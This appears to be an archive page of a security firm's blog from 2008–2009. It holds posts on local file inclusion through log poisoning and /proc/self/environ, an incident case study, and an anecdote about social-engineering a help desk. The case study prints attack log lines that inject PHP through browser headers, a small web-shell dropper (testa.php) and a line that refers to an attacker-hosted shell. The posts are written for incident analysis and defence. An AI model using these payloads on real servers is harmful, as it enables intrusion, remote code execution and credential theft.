INCLUDE_DATA

Posts Tagged ‘security’

Further Notes On LFI

Monday, March 23rd, 2009

Having encountered the last LFI attack on my client, I researched a little more on ways that LFI can be used to exploit different scenarios. There is one other main adaptation of the concept which has been published by various sources, including milw0rm – log poisoning.

It would seem that Apache access logs as well as error logs can be injected with code such that when the log file is accessed, the code is parsed. Which means to say, the previous exploit that was used -

92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../../proc/self/environ%00 HTTP/1.1"
200 15491 "-"
"<? $o=fopen(\"testa.php\",\"a+\");
fwrite($o,\"stefo je king\"); fclose($o); ?>"

was exploitable in two different ways. The first way was described in the previous post. The second way would be that instead of writing “stefo je king”, if an actual PHP script like

$o = fopen("shell.php","w");
fwrite($o,"http://attacker/shell.txt");fclose($o);

was used, the the attacker could have tried to used the traversal attack to access a log file and get the shell script on the server again.

Another interesting piece of information I found was – let’s say Apache was installed in a non-default location and logs were therefore placed in a folder that was unknown to you. You have tried the default list of folders to search for and are out of ideas. Of course, the site is vulnerable to LFI. You could inject a piece of code to read from -

/proc/self/cmdline

Like /proc/self/environ shows the current environment status, /proc/self/cmdline shows the command line argument that spawned the process calling it. For example, if you’re calling it from shell, you’ll get “-bash” as the response. If Apache calls it, you’ll get the full path where Apache is installed. And you will then know where to find the logs.

As rhican rightly asserts, “good hosters should block access to /proc imho there’s tons of stuff a php script as no business there”.

Tags: , , , ,
Posted in Research | No Comments »

Case Study – Directory Traversal & Remote Code Execution Using /proc/self/environ

Monday, March 9th, 2009

Credits to Christian Busch for helping me out on this one. :)

Late last night, I was approached with an interesting case of a denial of service attack. And I mean it – no one was able to access the service – because all files were deleted. The client informed me that remote shell scripts were able to find their way onto the server.

The first step was obviously to restore the files on the server, which was trivial given that WHM made daily backups for him. Then the search for the shell scripts began. I identified a couple of them –

File found - backup.php (2463) - 03/06/2009
File found - shelld.php (23124) - 03/08/2009
File found - .php (96420) - 03/07/2009
File found - testa.php (85) - 03/08/2009
File found - test.php (38868) - 02/05/2009
File found - c.php (597944) - 02/25/2009

The files are zipped and downloadable. Be sure to manage your AV exclusions. :)

The file that requires some attention is testa.php.

testa.php

<? $aa = $_POST["shell"];
$o = fopen("shelld.php","wb");fwrite($o,$aa);fclose($o); ?>

I shall cut the crap and go straight to the logs. You may download a copy of all the logs here. But let’s take a look at a sample line –

92.241.137.238 - - [07/Mar/2009:23:36:02 +0000]
"GET /?p=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1"
200 15491 "-"
"<? $o=fopen(\"testa.php\",\"a+\"); fwrite($o,\"stefo je king\"); fclose($o); ?>"

A directory traversal attack! I haven’t seen one like that in years!  But this one is smart. For those who do not understand what that line in the logs mean – a user using the IP address 92.241.137.238 visited the page

/?p=../../../../../../../../../../../../../proc/self/environ%00

with the browser headers as PHP code.

Let’s take a look at the output of the GET URL –

Smart, eh?

Smart, eh? Click to enlarge.

It seems like the browser and PHP information are output.

Looking at some relevant PHP code –

 <? // Change This
        $p = stripslashes($_REQUEST['p']);
    if(file_exists(CWD.'/'.$p.'.php')){
        include(CWD.'/'.$p.'.php');
    }else{
        include(CWD.'/'.$_SESSION['lan'].'/'.$p.'.php');
}?>

“This” certainly needs to be changed. ;)

Let’s look at the query executed again. The null byte is used to ignore the “.php” extension and only include /proc/self/environ

What’s even smarter is this – because browser information is include’d, PHP code was used as the browser headers and was therefore included and parsed.

If you look further down the logs, you will realize that the C99 shell is also included from a certain URL –

Shells. Sea Shells. Remote Shells. Evil Shells.

Shells. Sea Shells. Remote Shells. Evil Shells.

Looks like someone set up a site just for this purpose.

There are other things probably worth mentioning, but I guess not this time. The things to take away would be –

  1. Always sanitize parameters passed to functions like require’s, require_once’s, include’s, include_once’s, fopen’s, file_get_contents’, etc to prevent directory traversal
  2. Using /proc/self/environ as an attack vector to execute PHP code remotely that is hardly ever published. I hope that this article provided you with some insights.
  3. And to all the security researchers out there – You can now stop using the cat /etc/passwd POC and start using something like this. =)

Have fun and take care :)

Tags: , , ,
Posted in Research | 1 Comment »

OOO Flame

Monday, September 15th, 2008

Apologies for not posting recently. I’ve been pretty busy (and still am) with a couple of new projects that require a lot of PR work from me.

Anyways, recently, there was an OOO flame on the SecurityFocus Pen-Test mailing list. Following that, a “real life scenario” was shared by Jon R. Kibler, CTO of Advanced Systems Engineering Technology, Inc.

I was teaching a pen-test bootcamp several years ago. One of the students (who I will call ‘Joe’) pooh-poohed the whole OOO message issue. He even indicated that he used them all the time, that they were harmless, and they saved him from getting calls to his cell phone at roaming rates when he was out of town. (This was back in the days before nationwide calling plans.)

I then sent Joe a test email message at his work email address. I got back an OOO message saying that he would be out of the office for two weeks of training and would only have very limited email at night. His
signature line showed that he was the dep-CSO for his organization.

I then displayed the email for the whole class to discuss. Next, I proposed that we demonstrate why OOO messages are an issue.

What I proposed was to social engineer the help desk into providing sensitive information. Rather arrogantly, he said, “Sure, why not? Those guys are well trained and would never fall for anything you could contrive.” We then got permission (in writing) from the CIO, the CSO, and the organization’s legal department to do the social engineering attack.

Next, I wrote up a script for a secretary (who I will call ‘Sue’) at that ed center to use to call the organization’s help desk. It basically went as follows:

Sue: “Hi, I’m Sue with abc training company. One of your employees, Joe, is taking a security course from us and he forgot that he was supposed to bring the /etc/shadow file from the user file store server. He needs it to use in class to test password cracking. He asked that you please gzip it and email it to him.”

Help Desk: “Okay, but I will have to check with his manager first.”

Sue: “Oh, Joe said that if you needed to verify that he was taking a course from us, just send him an email and the OOO reply it will have everything you need to know.”

Help Desk: “Alright, give me a minute. (Pause) Okay, I guess this has everything I need. But, it says that he has limited email access; does he want it sent to his office email address?”

(This just shows that help desks are trained to be helpful!!! Despite continual security awareness training, the possibility that this might be social engineering attack never even occurred to this guy!)

Sue: “No, I was just about to tell you that he asked to have you it send to his Hotmail address, which is: joe….@hotmail.com.”

Help Desk: “Okay, no problem, he should have it in about 5 minutes.”

Needless to say, we had just created the hotmail account a few minutes prior to the phone call.

In just a couple of minutes, we owned the shadow file from the file server where all user accounts have their data stored. In other words, we now pwned the passwords for every one of his users.

After that b-slap with a clue-by-4, Joe started singing a different tune.

Looks like an interesting story, except that I find a number of seeming loopholes in it. Or perhaps it’s just my bad understanding.

- The helpdesk operator knows how to operate Linux and retrieve the /etc/shadow file
- The helpdesk operator has access to the /etc/shadow file =O
- I don’t see any link between “having limited email at night” and the need to send it to a different email account.

Maybe it’s just me. Let’s see how the conversation evolves…

Tags: , ,
Posted in Bits and Pieces | No Comments »

Displaying Version Numbers

Friday, August 29th, 2008

I just read that DarkFig from milw0rm released a PHP script that targets multiple vulnerabilities present in Invision Power Board (IPB), versions <= 2.3.5. I run an IPB forum together with a few other people and I noticed that right at the bottom, there’s this little footnote…

Powered By IP.Board 2.3.5 © 2008  IPS, Inc.

In all frustration, I told one of my guys to remove the version from the footer. After all, with almost 50,000 members, half of whom are probably easily irritable and irrational, it wouldn’t take too much of a genius to notice the same things I did and launch an attack.

In defence, he presented me with this argument – displaying the version number shows users that we are diiligent at patching our software, with 2.3.5 being the latest version available and we’ve got it. It gives them the sense of security and the “illusion” that we are responsible forum admins.

This lead me to think – is removing the version number from software that is exposed to the web (including, but not limited to web applications, server operating system, web backend, etc) just security through obscurity? Or is there really more to it?

When people say “security through obscurity is no security at all”, it probably holds true in the long term, whereby the number of attacking attempts and possible vulnerabilities found increases as time passes. In the short term, though, it might be better to always provide yourself with some time buffer. So, I say, spoof / remove version numbers from being displayed.

What are your views?

Tags: , , , , ,
Posted in Bits and Pieces | No Comments »

Installation Directories

Thursday, August 28th, 2008

It has always been traditional that we delete installation folders upon the successful installation of a web application. Well, for me at least. Leaving it where it is (especially with directory listing turned on) is just suicide – possibilities are endless.

- Reset of admin account password
- Flushing of database
- Generation of publicly-accessible database dump
- Etc.

And that’s exactly what will happen to you if you think that you’re safe -

YourOwnBux installation screen at an undisclosed site

(Of course, I’ve informed the site administrator about it.)

I hope he’s learnt his lesson. And everyone else has learnt from his mistake too. :)

Edit: Yet another one

You'd think they'd at least follow instructions.

You'd think they'd follow instructions. But, no...

And again-

wooooot!

wooooot!

That aside, YourOwnBux has just suffered a full vulnerability disclosure from milw0rm. Expect more of its sites to get hacked pretty soon.

Tags: , , , , , , ,
Posted in Bits and Pieces | No Comments »

The New Blog Launched!

Thursday, August 28th, 2008

Hi guys,

Tonight, Searix Security Solutions has a new home for its blog. This blog will be managed by multiple people and will include guest writers from various people in the industry from time to time. Of course, the main content would be relating to security. ;)

The blog will contain random bits and pieces of information, updated news about the IT security industry, our reviews of security-related software, events and services, and of course, it will feature out own research and products!

So, stick with us and stay up to date! :)

Tags: , , , ,
Posted in Random | No Comments »